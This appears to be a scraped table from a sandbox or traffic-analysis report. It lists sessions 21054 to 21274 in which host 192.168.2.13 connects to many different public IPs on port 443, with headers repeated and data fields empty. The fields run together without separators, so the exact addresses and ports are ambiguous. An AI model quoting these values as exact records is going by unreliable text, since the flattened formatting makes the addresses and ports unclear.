                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21054192.168.2.1342384165.31.236.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21055192.168.2.1346768221.156.19.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21056192.168.2.1349502188.0.238.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21057192.168.2.1344716149.190.187.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21058192.168.2.1347572184.124.84.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21059192.168.2.1348030139.243.229.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21060192.168.2.133921459.76.55.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21061192.168.2.1352508188.159.37.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21062192.168.2.1353094155.61.53.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21063192.168.2.135337046.10.115.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21064192.168.2.1353776210.66.11.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21065192.168.2.135764032.218.111.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21066192.168.2.134619239.66.220.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21067192.168.2.135957427.135.138.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21068192.168.2.1359134207.21.163.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21069192.168.2.1356968114.193.0.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21070192.168.2.134476027.113.242.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21071192.168.2.1359586212.38.21.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21072192.168.2.1358964102.124.81.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21073192.168.2.1347824213.6.225.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21074192.168.2.1357696183.77.249.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21075192.168.2.1347282180.79.33.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21076192.168.2.135652047.118.83.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21077192.168.2.1339698146.3.24.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21078192.168.2.1340128203.15.96.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21079192.168.2.1358692143.111.9.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21080192.168.2.1349244172.254.213.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21081192.168.2.1336652145.242.28.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21082192.168.2.135093842.163.55.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21083192.168.2.1356044146.228.120.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21084192.168.2.1341902110.70.112.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21085192.168.2.133477466.51.128.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21086192.168.2.134595876.255.77.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21087192.168.2.135772088.78.168.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21088192.168.2.1347360167.193.97.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21089192.168.2.1353058151.134.30.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21090192.168.2.133988827.208.159.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21091192.168.2.1344156119.214.36.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21092192.168.2.1333688112.121.243.222443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21093192.168.2.1360602196.164.196.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21094192.168.2.1343074124.58.16.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21095192.168.2.1337222173.69.168.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21096192.168.2.135999659.184.68.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21097192.168.2.1349976164.221.172.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21098192.168.2.1333524103.62.255.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21099192.168.2.1353120154.54.3.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21100192.168.2.1346156188.58.170.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21101192.168.2.1334256107.138.15.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21102192.168.2.1347260171.98.213.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21103192.168.2.135075248.210.18.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21104192.168.2.1343344200.128.242.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21105192.168.2.1353216148.217.111.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21106192.168.2.1344268208.85.112.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21107192.168.2.133552442.218.238.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21108192.168.2.1336564151.172.218.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21109192.168.2.135799284.239.231.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21110192.168.2.1344004140.239.108.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21111192.168.2.1334962107.142.12.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21112192.168.2.134771436.33.240.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21113192.168.2.133662860.99.87.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21114192.168.2.1348648207.151.95.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21115192.168.2.1338106191.55.159.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21116192.168.2.1353760145.103.156.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21117192.168.2.134963886.220.154.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21118192.168.2.1349586125.124.195.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21119192.168.2.1345294131.166.20.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21120192.168.2.135279472.107.159.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21121192.168.2.135071619.16.242.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21122192.168.2.134154081.188.88.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21123192.168.2.1335176196.93.102.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21124192.168.2.133436491.148.95.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21125192.168.2.134985673.117.45.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21126192.168.2.1341590170.10.77.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21127192.168.2.134810684.134.209.70443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21128192.168.2.1351370151.237.198.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21129192.168.2.135300865.29.105.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21130192.168.2.1356582121.7.36.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21131192.168.2.1350908130.87.141.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21132192.168.2.1333490106.197.221.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21133192.168.2.134427086.69.191.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21134192.168.2.1357116101.203.163.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21135192.168.2.1338996166.100.192.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21136192.168.2.1344994165.230.204.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21137192.168.2.1348488162.237.121.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21138192.168.2.1335224104.202.108.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21139192.168.2.133786435.99.250.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21140192.168.2.1341788117.163.180.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21141192.168.2.1352094110.94.179.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21142192.168.2.133937620.75.128.174443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21143192.168.2.1350402189.182.60.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21144192.168.2.135626689.194.60.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21145192.168.2.1333740168.255.75.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21146192.168.2.1354546184.16.58.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21147192.168.2.134877244.222.204.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21148192.168.2.1333118195.60.151.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21149192.168.2.1341788158.106.77.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21150192.168.2.135733498.50.239.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21151192.168.2.1346920177.63.11.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21152192.168.2.1340886202.28.25.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21153192.168.2.134527846.12.191.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21154192.168.2.1332796160.9.161.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21155192.168.2.134840872.50.236.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21156192.168.2.133321290.160.178.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21157192.168.2.134812854.86.94.222443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21158192.168.2.1339878132.61.71.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21159192.168.2.1336804113.224.27.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21160192.168.2.133967858.125.253.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21161192.168.2.1336636213.205.116.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21162192.168.2.1346450116.95.170.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21163192.168.2.1346096169.112.60.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21164192.168.2.1344536202.216.99.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21165192.168.2.1355326151.143.175.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21166192.168.2.1353410184.83.137.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21167192.168.2.1334500150.44.8.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21168192.168.2.1344084124.172.249.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21169192.168.2.13427408.255.246.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21170192.168.2.1357632152.35.251.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21171192.168.2.135811638.28.224.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21172192.168.2.135767678.76.88.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21173192.168.2.1359542157.239.137.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21174192.168.2.1358774180.58.82.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21175192.168.2.133443452.195.64.111443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21176192.168.2.134523280.98.70.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21177192.168.2.133344220.185.176.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21178192.168.2.1352450124.33.55.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21179192.168.2.1350690134.168.178.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21180192.168.2.134775040.153.203.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21181192.168.2.1336142137.234.101.79443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21182192.168.2.13374201.149.68.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21183192.168.2.135883467.61.244.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21184192.168.2.1334586188.221.54.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21185192.168.2.1338822192.81.73.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21186192.168.2.133476812.11.51.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21187192.168.2.1334894211.74.255.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21188192.168.2.1353882200.81.197.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21189192.168.2.135730232.206.105.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21190192.168.2.134809825.163.235.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21191192.168.2.13434281.196.6.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21192192.168.2.1351090175.42.44.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21193192.168.2.1350038152.44.59.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21194192.168.2.1347012164.192.118.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21195192.168.2.134420452.17.185.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21196192.168.2.1347962200.152.205.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21197192.168.2.133782049.187.220.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21198192.168.2.133731851.165.172.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21199192.168.2.1358110157.25.49.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21200192.168.2.133858225.223.205.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21201192.168.2.1360428121.201.13.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21202192.168.2.133664876.133.196.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21203192.168.2.1334502220.107.18.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21204192.168.2.133996881.190.59.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21205192.168.2.1340882122.164.86.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21206192.168.2.1337232128.19.155.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21207192.168.2.1338104207.60.13.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21208192.168.2.1345904110.186.140.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21209192.168.2.1350456176.99.79.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21210192.168.2.1359792178.151.156.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21211192.168.2.1344158112.70.210.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21212192.168.2.134817690.206.216.255443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21213192.168.2.1342736211.125.153.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21214192.168.2.1347482142.55.145.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21215192.168.2.134873436.95.208.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21216192.168.2.1355620202.85.79.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21217192.168.2.1344274174.141.99.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21218192.168.2.134537466.80.77.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21219192.168.2.1349520173.203.36.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21220192.168.2.1355662195.182.240.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21221192.168.2.135898641.90.53.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21222192.168.2.1333342171.185.49.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21223192.168.2.1334426202.169.183.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21224192.168.2.1335724118.188.213.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21225192.168.2.1340336114.57.98.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21226192.168.2.1335754125.161.118.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21227192.168.2.134698431.137.113.70443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21228192.168.2.1356796134.48.159.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21229192.168.2.134738284.123.127.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21230192.168.2.1342964180.61.9.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21231192.168.2.135573686.82.163.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21232192.168.2.133846079.39.63.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21233192.168.2.1345432156.92.154.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21234192.168.2.1338166160.95.84.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21235192.168.2.136049889.95.59.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21236192.168.2.1346230110.55.211.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21237192.168.2.1354650162.126.59.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21238192.168.2.1342056135.186.84.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21239192.168.2.135407854.153.113.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21240192.168.2.1357170146.57.187.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21241192.168.2.1352992198.161.113.111443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21242192.168.2.133762688.214.93.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21243192.168.2.13573505.1.196.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21244192.168.2.135777254.218.209.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21245192.168.2.1346976211.180.181.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21246192.168.2.1360454112.141.206.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21247192.168.2.1342592128.67.125.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21248192.168.2.1334214179.77.176.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21249192.168.2.1354048207.149.108.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21250192.168.2.1335474117.35.117.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21251192.168.2.1349482110.44.203.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21252192.168.2.1342086191.142.194.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21253192.168.2.1339126168.6.15.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21254192.168.2.134204698.144.170.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21255192.168.2.1352680217.33.228.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21256192.168.2.1342580159.167.168.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21257192.168.2.1341572147.216.28.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21258192.168.2.1351182117.248.192.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21259192.168.2.1346518203.62.192.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21260192.168.2.135322017.89.158.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21261192.168.2.1341466204.192.196.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21262192.168.2.1347580181.145.15.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21263192.168.2.134932254.240.95.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21264192.168.2.13419304.148.246.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21265192.168.2.1343180173.20.168.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21266192.168.2.1334708142.75.253.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21267192.168.2.1339162166.43.82.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21268192.168.2.133995699.57.245.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21269192.168.2.1360918167.231.17.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21270192.168.2.1341870117.94.112.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21271192.168.2.133689072.251.61.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21272192.168.2.134041291.211.225.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21273192.168.2.1359910218.229.227.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21274192.168.2.1350806136.90.28.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
